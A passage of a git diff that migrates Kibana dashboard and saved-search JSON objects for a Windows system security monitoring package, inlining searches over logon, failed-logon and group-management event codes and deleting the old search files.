"system-bae11b00-9bfc-11ea-87e4-49f31ec44891", - "migrationVersion": { - "dashboard": "8.7.0" - }, "references": [ { "id": "logs-*", @@ -1542,11 +1662,6 @@ "name": "3:c92cd2bc-c3a2-40cf-8932-aa33cee31978", "type": "index-pattern" }, - { - "id": "system-ce71c9a0-a25e-11e9-a422-d144027429da", - "name": "10:panel_10", - "type": "search" - }, { "id": "logs-*", "name": "cf50b48e-453c-46fb-ad35-7ccfb7b03de0:indexpattern-datasource-layer-674fcc58-08d6-4ab5-b6cb-671d86391a1f", @@ -1567,11 +1682,6 @@ "name": "2ccb4f49-c9ee-48a0-b602-f86fa0e21504:b48f02eb-a573-4758-a23f-ab02a2379751", "type": "index-pattern" }, - { - "id": "system-6f4071a0-7a78-11ea-bc9a-0baf2ca323a3", - "name": "454bb008-9720-455e-8ab9-b2f47d25aa4f:panel_454bb008-9720-455e-8ab9-b2f47d25aa4f", - "type": "search" - }, { "id": "logs-*", "name": "29a0e70a-ab23-4d48-8d4e-9a39c5af47ad:indexpattern-datasource-layer-4a1aa374-6802-4ad3-aaa8-5178d0944859", @@ -1583,10 +1693,42 @@ "type": "index-pattern" }, { - "id": "system-06b6b060-7a80-11ea-bc9a-0baf2ca323a3", - "name": "28115147-8399-4fcd-95ce-ed0a4f4239e3:panel_28115147-8399-4fcd-95ce-ed0a4f4239e3", - "type": "search" + "type": "index-pattern", + "name": "10:kibanaSavedObjectMeta.searchSourceJSON.index", + "id": "logs-*" + }, + { + "type": "index-pattern", + "name": "10:kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "id": "logs-*" + }, + { + "type": "index-pattern", + "name": "454bb008-9720-455e-8ab9-b2f47d25aa4f:kibanaSavedObjectMeta.searchSourceJSON.index", + "id": "logs-*" + }, + { + "type": "index-pattern", + "name": "454bb008-9720-455e-8ab9-b2f47d25aa4f:kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "id": "logs-*" + }, + { + "type": "index-pattern", + "name": "28115147-8399-4fcd-95ce-ed0a4f4239e3:kibanaSavedObjectMeta.searchSourceJSON.index", + "id": "logs-*" + }, + { + "type": "index-pattern", + "name": "28115147-8399-4fcd-95ce-ed0a4f4239e3:kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "id": "logs-*" + }, + { + "type": "index-pattern", + "name": "28115147-8399-4fcd-95ce-ed0a4f4239e3:kibanaSavedObjectMeta.searchSourceJSON.filter[1].meta.index", + "id": "logs-*" } ], - "type": "dashboard" + "managed": false, + "coreMigrationVersion": "8.8.0", + "typeMigrationVersion": "8.9.0" } \ No newline at end of file diff --git a/packages/system/kibana/dashboard/system-bb858830-f412-11e9-8405-516218e3d268.json b/packages/system/kibana/dashboard/system-bb858830-f412-11e9-8405-516218e3d268.json index 656c57612a9..9ed66a498d0 100644 --- a/packages/system/kibana/dashboard/system-bb858830-f412-11e9-8405-516218e3d268.json +++ b/packages/system/kibana/dashboard/system-bb858830-f412-11e9-8405-516218e3d268.json @@ -1,4 +1,15 @@ { + "id": "system-bb858830-f412-11e9-8405-516218e3d268", + "type": "dashboard", + "namespaces": [ + "default" + ], + "migrationVersion": { + "dashboard": "8.9.0" + }, + "updated_at": "2024-01-22T13:28:13.685Z", + "created_at": "2024-01-22T13:28:13.685Z", + "version": "WzEzMSwxXQ==", "attributes": { "description": "Group management activity.", "kibanaSavedObjectMeta": { @@ -81,6 +92,16 @@ }, "panelsJSON": [ { + "version": "8.9.0", + "type": "visualization", + "gridData": { + "h": 7, + "i": "22", + "w": 16, + "x": 0, + "y": 0 + }, + "panelIndex": "22", "embeddableConfig": { "enhancements": {}, "savedVis": { @@ -103,21 +124,22 @@ "title": "Group Management Events - Description [Windows System Security]", "type": "markdown", "uiState": {} - } + }, + "type": "visualization" }, + "title": "" + }, + { + "version": "8.9.0", + "type": "lens", "gridData": { - "h": 7, - "i": "22", - "w": 16, + "h": 13, + "i": "36", + "w": 9, "x": 0, - "y": 0 + "y": 55 }, - "panelIndex": "22", - "title": "", - "type": "visualization", - "version": "8.7.0" - }, - { + "panelIndex": "36", "embeddableConfig": { "attributes": { "references": [ @@ -387,21 +409,22 @@ "visualizationType": "lnsDatatable" }, "enhancements": {}, - "hidePanelTitles": false + "hidePanelTitles": false, + "type": "lens" }, + "title": "Groups Created - Table [Windows System Security]" + }, + { + "version": "8.9.0", + "type": "lens", "gridData": { "h": 13, - "i": "36", + "i": "37", "w": 9, - "x": 0, + "x": 9, "y": 55 }, - "panelIndex": "36", - "title": "Groups Created - Table [Windows System Security]", - "type": "lens", - "version": "8.7.0" - }, - { + "panelIndex": "37", "embeddableConfig": { "attributes": { "references": [ @@ -677,21 +700,22 @@ "visualizationType": "lnsDatatable" }, "enhancements": {}, - "hidePanelTitles": false + "hidePanelTitles": false, + "type": "lens" }, + "title": "Group Changes - Table [Windows System Security]" + }, + { + "version": "8.9.0", + "type": "lens", "gridData": { "h": 13, - "i": "37", + "i": "38", "w": 9, - "x": 9, + "x": 18, "y": 55 }, - "panelIndex": "37", - "title": "Group Changes - Table [Windows System Security]", - "type": "lens", - "version": "8.7.0" - }, - { + "panelIndex": "38", "embeddableConfig": { "attributes": { "references": [ @@ -961,21 +985,22 @@ "visualizationType": "lnsDatatable" }, "enhancements": {}, - "hidePanelTitles": false + "hidePanelTitles": false, + "type": "lens" }, - "gridData": { - "h": 13, - "i": "38", - "w": 9, - "x": 18, - "y": 55 - }, - "panelIndex": "38", - "title": "Groups Deleted - Table [Windows System Security]", - "type": "lens", - "version": "8.7.0" + "title": "Groups Deleted - Table [Windows System Security]" }, { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 14, + "i": "39", + "w": 16, + "x": 0, + "y": 75 + }, + "panelIndex": "39", "embeddableConfig": { "attributes": { "references": [ @@ -1276,21 +1301,22 @@ "visualizationType": "lnsDatatable" }, "enhancements": {}, - "hidePanelTitles": false + "hidePanelTitles": false, + "type": "lens" }, + "title": "Users Added - Table [Windows System Security]" + }, + { + "version": "8.9.0", + "type": "lens", "gridData": { "h": 14, - "i": "39", - "w": 16, - "x": 0, + "i": "40", + "w": 17, + "x": 16, "y": 75 }, - "panelIndex": "39", - "title": "Users Added - Table [Windows System Security]", - "type": "lens", - "version": "8.7.0" - }, - { + "panelIndex": "40", "embeddableConfig": { "attributes": { "references": [ @@ -1591,21 +1617,22 @@ "visualizationType": "lnsDatatable" }, "enhancements": {}, - "hidePanelTitles": false + "hidePanelTitles": false, + "type": "lens" }, + "title": "Users Removed from Group - Table [Windows System Security]" + }, + { + "version": "8.9.0", + "type": "lens", "gridData": { "h": 14, - "i": "40", - "w": 17, - "x": 16, + "i": "42", + "w": 15, + "x": 33, "y": 75 }, - "panelIndex": "40", - "title": "Users Removed from Group - Table [Windows System Security]", - "type": "lens", - "version": "8.7.0" - }, - { + "panelIndex": "42", "embeddableConfig": { "attributes": { "references": [ @@ -1833,23 +1860,48 @@ "visualizationType": "lnsDatatable" }, "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 14, - "i": "42", - "w": 15, - "x": 33, - "y": 75 + "hidePanelTitles": false, + "type": "lens" }, - "panelIndex": "42", - "title": "Group Enumeration - Table [Windows System Security]", - "type": "lens", - "version": "8.7.0" + "title": "Group Enumeration - Table [Windows System Security]" }, { "embeddableConfig": { - "enhancements": {} + "enhancements": {}, + "attributes": { + "columns": [ + "user.name", + "source.domain", + "source.ip", + "winlog.logon.id", + "winlog.logon.type" + ], + "description": "", + "hits": 0, + "kibanaSavedObjectMeta": { + "searchSourceJSON": "{\"filter\":[{\"$state\":{\"store\":\"appState\"},\"meta\":{\"alias\":null,\"disabled\":false,\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index\",\"key\":\"event.code\",\"negate\":false,\"params\":[\"4624\"],\"type\":\"phrases\",\"value\":\"4624\"},\"query\":{\"bool\":{\"minimum_should_match\":1,\"should\":[{\"match_phrase\":{\"event.code\":\"4624\"}}]}}}],\"highlightAll\":true,\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\",\"query\":{\"language\":\"kuery\",\"query\":\"data_stream.dataset:windows.security OR data_stream.dataset:system.security\"},\"version\":true}" + }, + "sort": [ + [ + "@timestamp", + "desc" + ] + ], + "title": "Logon Details [Windows System Security]", + "version": 1, + "references": [ + { + "id": "logs-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.index", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "type": "index-pattern" + } + ] + } }, "gridData": { "h": 20, @@ -1859,14 +1911,48 @@ "y": 48 }, "panelIndex": "43", - "panelRefName": "panel_43", "title": "Logon Details [Windows System Security]", "type": "search", - "version": "8.7.0" + "version": "8.0.0" }, { "embeddableConfig": { - "enhancements": {} + "enhancements": {}, + "attributes": { + "columns": [ + "event.action", + "group.name", + "group.domain", + "user.name", + "user.domain", + "host.name" + ], + "description": "", + "hits": 0, + "kibanaSavedObjectMeta": { + "searchSourceJSON": "{\"filter\":[{\"$state\":{\"store\":\"appState\"},\"meta\":{\"alias\":null,\"disabled\":false,\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index\",\"key\":\"event.code\",\"negate\":false,\"params\":[\"4731\",\"4732\",\"4733\",\"4734\",\"4735\",\"4737\",\"4764\",\"4727\",\"4728\",\"4729\",\"4730\",\"4754\",\"4755\",\"4756\",\"4757\",\"4758\",\"4799\",\"4749\",\"4750\",\"4751\",\"4752\",\"4753\",\"4759\",\"4760\",\"4761\",\"4762\",\"4763\",\"4744\",\"4745\",\"4746\",\"4748\"],\"type\":\"phrases\",\"value\":\"4731, 4732, 4733, 4734, 4735, 4737, 4764, 4727, 4728, 4729, 4730, 4754, 4755, 4756, 4757, 4758, 4799, 4749, 4750, 4751, 4752, 4753, 4759, 4760, 4761, 4762, 4763, 4744, 4745, 4746, 4748\"},\"query\":{\"bool\":{\"minimum_should_match\":1,\"should\":[{\"match_phrase\":{\"event.code\":\"4731\"}},{\"match_phrase\":{\"event.code\":\"4732\"}},{\"match_phrase\":{\"event.code\":\"4733\"}},{\"match_phrase\":{\"event.code\":\"4734\"}},{\"match_phrase\":{\"event.code\":\"4735\"}},{\"match_phrase\":{\"event.code\":\"4737\"}},{\"match_phrase\":{\"event.code\":\"4764\"}},{\"match_phrase\":{\"event.code\":\"4727\"}},{\"match_phrase\":{\"event.code\":\"4728\"}},{\"match_phrase\":{\"event.code\":\"4729\"}},{\"match_phrase\":{\"event.code\":\"4730\"}},{\"match_phrase\":{\"event.code\":\"4754\"}},{\"match_phrase\":{\"event.code\":\"4755\"}},{\"match_phrase\":{\"event.code\":\"4756\"}},{\"match_phrase\":{\"event.code\":\"4757\"}},{\"match_phrase\":{\"event.code\":\"4758\"}},{\"match_phrase\":{\"event.code\":\"4799\"}},{\"match_phrase\":{\"event.code\":\"4749\"}},{\"match_phrase\":{\"event.code\":\"4750\"}},{\"match_phrase\":{\"event.code\":\"4751\"}},{\"match_phrase\":{\"event.code\":\"4752\"}},{\"match_phrase\":{\"event.code\":\"4753\"}},{\"match_phrase\":{\"event.code\":\"4759\"}},{\"match_phrase\":{\"event.code\":\"4760\"}},{\"match_phrase\":{\"event.code\":\"4761\"}},{\"match_phrase\":{\"event.code\":\"4762\"}},{\"match_phrase\":{\"event.code\":\"4763\"}},{\"match_phrase\":{\"event.code\":\"4744\"}},{\"match_phrase\":{\"event.code\":\"4745\"}},{\"match_phrase\":{\"event.code\":\"4746\"}},{\"match_phrase\":{\"event.code\":\"4748\"}}]}}}],\"highlightAll\":true,\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\",\"query\":{\"language\":\"kuery\",\"query\":\"data_stream.dataset:windows.security OR data_stream.dataset:system.security\"},\"version\":true}" + }, + "sort": [ + [ + "@timestamp", + "desc" + ] + ], + "title": "Group Management Details - Search View [Windows System Security]", + "version": 1, + "references": [ + { + "id": "logs-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.index", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "type": "index-pattern" + } + ] + } }, "gridData": { "h": 22, @@ -1876,12 +1962,21 @@ "y": 89 }, "panelIndex": "45", - "panelRefName": "panel_45", "title": "Group Management Operations Details [Windows System Security]", "type": "search", - "version": "8.7.0" + "version": "8.0.0" }, { + "version": "8.9.0", + "type": "visualization", + "gridData": { + "h": 7, + "i": "663e0493-2070-407b-9d00-079915cce7e7", + "w": 32, + "x": 16, + "y": 0 + }, + "panelIndex": "663e0493-2070-407b-9d00-079915cce7e7", "embeddableConfig": { "enhancements": {}, "savedVis": { @@ -1904,21 +1999,22 @@ "title": "Dashboard links [Windows System Security]", "type": "markdown", "uiState": {} - } - }, - "gridData": { - "h": 7, - "i": "663e0493-2070-407b-9d00-079915cce7e7", - "w": 32, - "x": 16, - "y": 0 + }, + "type": "visualization" }, - "panelIndex": "663e0493-2070-407b-9d00-079915cce7e7", - "title": "", - "type": "visualization", - "version": "8.7.0" + "title": "" }, { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 20, + "i": "3f7e277d-09d1-4a79-bc17-bc5da5a7e290", + "w": 20, + "x": 0, + "y": 7 + }, + "panelIndex": "3f7e277d-09d1-4a79-bc17-bc5da5a7e290", "embeddableConfig": { "attributes": { "references": [ @@ -2240,21 +2336,22 @@ "visualizationType": "lnsPie" }, "enhancements": {}, - "hidePanelTitles": false + "hidePanelTitles": false, + "type": "lens" }, + "title": "Group Management Events - Event Actions [Windows System Security]" + }, + { + "version": "8.9.0", + "type": "lens", "gridData": { "h": 20, - "i": "3f7e277d-09d1-4a79-bc17-bc5da5a7e290", - "w": 20, - "x": 0, + "i": "74edddd5-2dc5-41b8-b4f2-bf9c95218f1b", + "w": 12, + "x": 20, "y": 7 }, - "panelIndex": "3f7e277d-09d1-4a79-bc17-bc5da5a7e290", - "title": "Group Management Events - Event Actions [Windows System Security]", - "type": "lens", - "version": "8.7.0" - }, - { + "panelIndex": "74edddd5-2dc5-41b8-b4f2-bf9c95218f1b", "embeddableConfig": { "attributes": { "references": [ @@ -2600,21 +2697,22 @@ "visualizationType": "lnsDatatable" }, "enhancements": {}, - "hidePanelTitles": false + "hidePanelTitles": false, + "type": "lens" }, + "title": "Group Management Events - Event Actions - Table [Windows System Security]" + }, + { + "version": "8.9.0", + "type": "lens", "gridData": { "h": 20, - "i": "74edddd5-2dc5-41b8-b4f2-bf9c95218f1b", - "w": 12, - "x": 20, + "i": "3016efc8-187d-4630-892d-af2160a584d7", + "w": 16, + "x": 32, "y": 7 }, - "panelIndex": "74edddd5-2dc5-41b8-b4f2-bf9c95218f1b", - "title": "Group Management Events - Event Actions - Table [Windows System Security]", - "type": "lens", - "version": "8.7.0" - }, - { + "panelIndex": "3016efc8-187d-4630-892d-af2160a584d7", "embeddableConfig": { "attributes": { "references": [ @@ -2737,21 +2835,22 @@ "visualizationType": "lnsXY" }, "enhancements": {}, - "hidePanelTitles": false + "hidePanelTitles": false, + "type": "lens" }, - "gridData": { - "h": 20, - "i": "3016efc8-187d-4630-892d-af2160a584d7", - "w": 16, - "x": 32, - "y": 7 - }, - "panelIndex": "3016efc8-187d-4630-892d-af2160a584d7", - "title": "Group Management Events - Target Groups [Windows System Security]", - "type": "lens", - "version": "8.7.0" + "title": "Group Management Events - Target Groups [Windows System Security]" }, { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 21, + "i": "33cef054-615a-49cb-bb2e-eb55fab96ae5", + "w": 27, + "x": 0, + "y": 27 + }, + "panelIndex": "33cef054-615a-49cb-bb2e-eb55fab96ae5", "embeddableConfig": { "attributes": { "references": [ @@ -3144,21 +3243,22 @@ "visualizationType": "lnsHeatmap" }, "enhancements": {}, - "hidePanelTitles": false + "hidePanelTitles": false, + "type": "lens" }, + "title": "Group Management Events - Groups vs Actions - Heatmap [Windows System Security]" + }, + { + "version": "8.9.0", + "type": "lens", "gridData": { "h": 21, - "i": "33cef054-615a-49cb-bb2e-eb55fab96ae5", - "w": 27, - "x": 0, + "i": "e0d495aa-f897-403f-815b-6116fae330b7", + "w": 21, + "x": 27, "y": 27 }, - "panelIndex": "33cef054-615a-49cb-bb2e-eb55fab96ae5", - "title": "Group Management Events - Groups vs Actions - Heatmap [Windows System Security]", - "type": "lens", - "version": "8.7.0" - }, - { + "panelIndex": "e0d495aa-f897-403f-815b-6116fae330b7", "embeddableConfig": { "attributes": { "references": [ @@ -3531,21 +3631,22 @@ "visualizationType": "lnsXY" }, "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 21, - "i": "e0d495aa-f897-403f-815b-6116fae330b7", - "w": 21, - "x": 27, - "y": 27 + "hidePanelTitles": false, + "type": "lens" }, - "panelIndex": "e0d495aa-f897-403f-815b-6116fae330b7", - "title": "Group Management Action Distribution over Time [Windows System Security]", - "type": "lens", - "version": "8.7.0" + "title": "Group Management Action Distribution over Time [Windows System Security]" }, { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 7, + "i": "e861343c-a5c9-4a8f-aacf-175a2d697587", + "w": 9, + "x": 0, + "y": 48 + }, + "panelIndex": "e861343c-a5c9-4a8f-aacf-175a2d697587", "embeddableConfig": { "attributes": { "references": [], @@ -3655,21 +3756,22 @@ "visualizationType": "lnsLegacyMetric" }, "enhancements": {}, - "hidePanelTitles": false + "hidePanelTitles": false, + "type": "lens" }, + "title": "" + }, + { + "version": "8.9.0", + "type": "lens", "gridData": { "h": 7, - "i": "e861343c-a5c9-4a8f-aacf-175a2d697587", + "i": "36142fad-01b3-43eb-a7c5-1b71fa6aa3bc", "w": 9, - "x": 0, + "x": 9, "y": 48 }, - "panelIndex": "e861343c-a5c9-4a8f-aacf-175a2d697587", - "title": "", - "type": "lens", - "version": "8.7.0" - }, - { + "panelIndex": "36142fad-01b3-43eb-a7c5-1b71fa6aa3bc", "embeddableConfig": { "attributes": { "references": [], @@ -3779,21 +3881,22 @@ "visualizationType": "lnsLegacyMetric" }, "enhancements": {}, - "hidePanelTitles": false + "hidePanelTitles": false, + "type": "lens" }, + "title": "" + }, + { + "version": "8.9.0", + "type": "lens", "gridData": { "h": 7, - "i": "36142fad-01b3-43eb-a7c5-1b71fa6aa3bc", + "i": "b03662fb-926d-49e0-b543-18ae6f526395", "w": 9, - "x": 9, + "x": 18, "y": 48 }, - "panelIndex": "36142fad-01b3-43eb-a7c5-1b71fa6aa3bc", - "title": "", - "type": "lens", - "version": "8.7.0" - }, - { + "panelIndex": "b03662fb-926d-49e0-b543-18ae6f526395", "embeddableConfig": { "attributes": { "references": [], @@ -3903,21 +4006,22 @@ "visualizationType": "lnsLegacyMetric" }, "enhancements": {}, - "hidePanelTitles": false + "hidePanelTitles": false, + "type": "lens" }, + "title": "" + }, + { + "version": "8.9.0", + "type": "lens", "gridData": { "h": 7, - "i": "b03662fb-926d-49e0-b543-18ae6f526395", - "w": 9, - "x": 18, - "y": 48 + "i": "744ba653-cbed-4af4-8114-ebe20b7ce075", + "w": 16, + "x": 0, + "y": 68 }, - "panelIndex": "b03662fb-926d-49e0-b543-18ae6f526395", - "title": "", - "type": "lens", - "version": "8.7.0" - }, - { + "panelIndex": "744ba653-cbed-4af4-8114-ebe20b7ce075", "embeddableConfig": { "attributes": { "references": [], @@ -4027,21 +4131,22 @@ "visualizationType": "lnsLegacyMetric" }, "enhancements": {}, - "hidePanelTitles": false + "hidePanelTitles": false, + "type": "lens" }, + "title": "" + }, + { + "version": "8.9.0", + "type": "lens", "gridData": { "h": 7, - "i": "744ba653-cbed-4af4-8114-ebe20b7ce075", - "w": 16, - "x": 0, + "i": "81b505b6-9694-40ed-8800-dfc5f41af3c8", + "w": 17, + "x": 16, "y": 68 }, - "panelIndex": "744ba653-cbed-4af4-8114-ebe20b7ce075", - "title": "", - "type": "lens", - "version": "8.7.0" - }, - { + "panelIndex": "81b505b6-9694-40ed-8800-dfc5f41af3c8", "embeddableConfig": { "attributes": { "references": [], @@ -4151,21 +4256,22 @@ "visualizationType": "lnsLegacyMetric" }, "enhancements": {}, - "hidePanelTitles": false + "hidePanelTitles": false, + "type": "lens" }, + "title": "" + }, + { + "version": "8.9.0", + "type": "lens", "gridData": { "h": 7, - "i": "81b505b6-9694-40ed-8800-dfc5f41af3c8", - "w": 17, - "x": 16, + "i": "2c3d475b-54d9-472a-b97a-03a37d7c944b", + "w": 15, + "x": 33, "y": 68 }, - "panelIndex": "81b505b6-9694-40ed-8800-dfc5f41af3c8", - "title": "", - "type": "lens", - "version": "8.7.0" - }, - { + "panelIndex": "2c3d475b-54d9-472a-b97a-03a37d7c944b", "embeddableConfig": { "attributes": { "references": [], @@ -4275,31 +4381,16 @@ "visualizationType": "lnsLegacyMetric" }, "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 7, - "i": "2c3d475b-54d9-472a-b97a-03a37d7c944b", - "w": 15, - "x": 33, - "y": 68 + "hidePanelTitles": false, + "type": "lens" }, - "panelIndex": "2c3d475b-54d9-472a-b97a-03a37d7c944b", - "title": "", - "type": "lens", - "version": "8.7.0" + "title": "" } ], "timeRestore": false, "title": "[System Windows Security] Group Management Events", "version": 1 }, - "coreMigrationVersion": "8.7.1", - "created_at": "2023-05-04T21:59:59.346Z", - "id": "system-bb858830-f412-11e9-8405-516218e3d268", - "migrationVersion": { - "dashboard": "8.7.0" - }, "references": [ { "id": "logs-*", @@ -4371,16 +4462,6 @@ "name": "42:5fd25934-f4ed-4561-8e83-22d8642198fe", "type": "index-pattern" }, - { - "id": "system-7e178c80-fee1-11e9-8405-516218e3d268", - "name": "43:panel_43", - "type": "search" - }, - { - "id": "system-9066d5b0-fef2-11e9-8405-516218e3d268", - "name": "45:panel_45", - "type": "search" - }, { "id": "logs-*", "name": "3f7e277d-09d1-4a79-bc17-bc5da5a7e290:indexpattern-datasource-layer-d498ce52-e422-4548-869e-12b54ca2a5de", @@ -4425,7 +4506,29 @@ "id": "logs-*", "name": "e0d495aa-f897-403f-815b-6116fae330b7:b7ec06e9-b2f3-4ec6-813b-e8cc45150c28", "type": "index-pattern" + }, + { + "type": "index-pattern", + "name": "43:kibanaSavedObjectMeta.searchSourceJSON.index", + "id": "logs-*" + }, + { + "type": "index-pattern", + "name": "43:kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "id": "logs-*" + }, + { + "type": "index-pattern", + "name": "45:kibanaSavedObjectMeta.searchSourceJSON.index", + "id": "logs-*" + }, + { + "type": "index-pattern", + "name": "45:kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "id": "logs-*" } ], - "type": "dashboard" + "managed": false, + "coreMigrationVersion": "8.8.0", + "typeMigrationVersion": "8.9.0" } \ No newline at end of file diff --git a/packages/system/kibana/dashboard/system-d401ef40-a7d5-11e9-a422-d144027429da.json b/packages/system/kibana/dashboard/system-d401ef40-a7d5-11e9-a422-d144027429da.json index 3f024f3a83a..072fcf8f5fb 100644 --- a/packages/system/kibana/dashboard/system-d401ef40-a7d5-11e9-a422-d144027429da.json +++ b/packages/system/kibana/dashboard/system-d401ef40-a7d5-11e9-a422-d144027429da.json @@ -1,4 +1,15 @@ { + "id": "system-d401ef40-a7d5-11e9-a422-d144027429da", + "type": "dashboard", + "namespaces": [ + "default" + ], + "migrationVersion": { + "dashboard": "8.9.0" + }, + "updated_at": "2024-01-22T13:28:13.685Z", + "created_at": "2024-01-22T13:28:13.685Z", + "version": "WzEzMiwxXQ==", "attributes": { "description": "Failed and blocked accounts.", "kibanaSavedObjectMeta": { @@ -1871,10 +1882,6 @@ "title": "[System Windows Security] Failed and Blocked Accounts", "version": 1 }, - "coreMigrationVersion": "8.8.0", - "created_at": "2023-10-09T20:57:22.959Z", - "id": "system-d401ef40-a7d5-11e9-a422-d144027429da", - "managed": false, "references": [ { "id": "logs-*", @@ -1992,6 +1999,7 @@ "type": "index-pattern" } ], - "type": "dashboard", + "managed": false, + "coreMigrationVersion": "8.8.0", "typeMigrationVersion": "8.9.0" } \ No newline at end of file diff --git a/packages/system/kibana/search/system-06b6b060-7a80-11ea-bc9a-0baf2ca323a3.json b/packages/system/kibana/search/system-06b6b060-7a80-11ea-bc9a-0baf2ca323a3.json deleted file mode 100644 index 82486ae0c14..00000000000 --- a/packages/system/kibana/search/system-06b6b060-7a80-11ea-bc9a-0baf2ca323a3.json +++ /dev/null @@ -1,101 +0,0 @@ -{ - "attributes": { - "columns": [ - "user.name", - "user.domain", - "winlog.logon.id", - "event.action", - "winlog.logon.type", - "winlog.event_data.SubjectUserName" - ], - "description": "", - "hits": 0, - "kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", - "key": "event.code", - "negate": false, - "params": { - "query": "4625" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "event.code": "4625" - } - } - }, - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[1].meta.index", - "key": "winlog.provider_name", - "negate": false, - "params": { - "query": "Microsoft-Windows-Security-Auditing" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "winlog.provider_name": "Microsoft-Windows-Security-Auditing" - } - } - } - ], - "highlightAll": true, - "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.index", - "query": { - "language": "kuery", - "query": "data_stream.dataset:windows.security OR data_stream.dataset:system.security" - }, - "version": true - } - }, - "sort": [ - [ - "@timestamp", - "desc" - ] - ], - "title": "User Logouts [Windows System Security]", - "version": 1 - }, - "coreMigrationVersion": "8.7.1", - "created_at": "2023-05-04T21:59:59.346Z", - "id": "system-06b6b060-7a80-11ea-bc9a-0baf2ca323a3", - "migrationVersion": { - "search": "8.0.0" - }, - "references": [ - { - "id": "logs-*", - "name": "kibanaSavedObjectMeta.searchSourceJSON.index", - "type": "index-pattern" - }, - { - "id": "logs-*", - "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", - "type": "index-pattern" - }, - { - "id": "logs-*", - "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[1].meta.index", - "type": "index-pattern" - } - ], - "type": "search" -} \ No newline at end of file diff --git a/packages/system/kibana/search/system-324686c0-fefb-11e9-8405-516218e3d268.json b/packages/system/kibana/search/system-324686c0-fefb-11e9-8405-516218e3d268.json deleted file mode 100644 index 2927c111bf7..00000000000 --- a/packages/system/kibana/search/system-324686c0-fefb-11e9-8405-516218e3d268.json +++ /dev/null @@ -1,144 +0,0 @@ -{ - "attributes": { - "columns": [ - "event.action", - "winlog.event_data.TargetUserName", - "user.domain", - "user.name", - "winlog.event_data.SubjectDomainName", - "winlog.logon.id", - "related.user" - ], - "description": "", - "hits": 0, - "kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", - "key": "event.code", - "negate": false, - "params": [ - "4720", - "4722", - "4723", - "4724", - "4725", - "4726", - "4738", - "4740", - "4767", - "4781", - "4798" - ], - "type": "phrases", - "value": "4720, 4722, 4723, 4724, 4725, 4726, 4738, 4740, 4767, 4781, 4798" - }, - "query": { - "bool": { - "minimum_should_match": 1, - "should": [ - { - "match_phrase": { - "event.code": "4720" - } - }, - { - "match_phrase": { - "event.code": "4722" - } - }, - { - "match_phrase": { - "event.code": "4723" - } - }, - { - "match_phrase": { - "event.code": "4724" - } - }, - { - "match_phrase": { - "event.code": "4725" - } - }, - { - "match_phrase": { - "event.code": "4726" - } - }, - { - "match_phrase": { - "event.code": "4738" - } - }, - { - "match_phrase": { - "event.code": "4740" - } - }, - { - "match_phrase": { - "event.code": "4767" - } - }, - { - "match_phrase": { - "event.code": "4781" - } - }, - { - "match_phrase": { - "event.code": "4798" - } - } - ] - } - } - } - ], - "highlightAll": true, - "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.index", - "query": { - "language": "kuery", - "query": "data_stream.dataset:windows.security OR data_stream.dataset:system.security" - }, - "version": true - } - }, - "sort": [ - [ - "@timestamp", - "desc" - ] - ], - "title": "User management Details - Search [Windows System Security]", - "version": 1 - }, - "coreMigrationVersion": "8.7.1", - "created_at": "2023-05-04T21:59:59.346Z", - "id": "system-324686c0-fefb-11e9-8405-516218e3d268", - "migrationVersion": { - "search": "8.0.0" - }, - "references": [ - { - "id": "logs-*", - "name": "kibanaSavedObjectMeta.searchSourceJSON.index", - "type": "index-pattern" - }, - { - "id": "logs-*", - "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", - "type": "index-pattern" - } - ], - "type": "search" -} \ No newline at end of file diff --git a/packages/system/kibana/search/system-62439dc0-f9c9-11e6-a747-6121780e0414.json b/packages/system/kibana/search/system-62439dc0-f9c9-11e6-a747-6121780e0414.json deleted file mode 100644 index beb8bef8ff9..00000000000 --- a/packages/system/kibana/search/system-62439dc0-f9c9-11e6-a747-6121780e0414.json +++ /dev/null @@ -1,46 +0,0 @@ -{ - "attributes": { - "columns": [ - "system.auth.ssh.event", - "system.auth.ssh.method", - "user.name", - "source.ip", - "source.geo.country_iso_code" - ], - "description": "", - "hits": 0, - "kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [], - "highlightAll": true, - "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.index", - "query": { - "language": "kuery", - "query": "data_stream.dataset:system.auth AND system.auth.ssh.event:*" - } - } - }, - 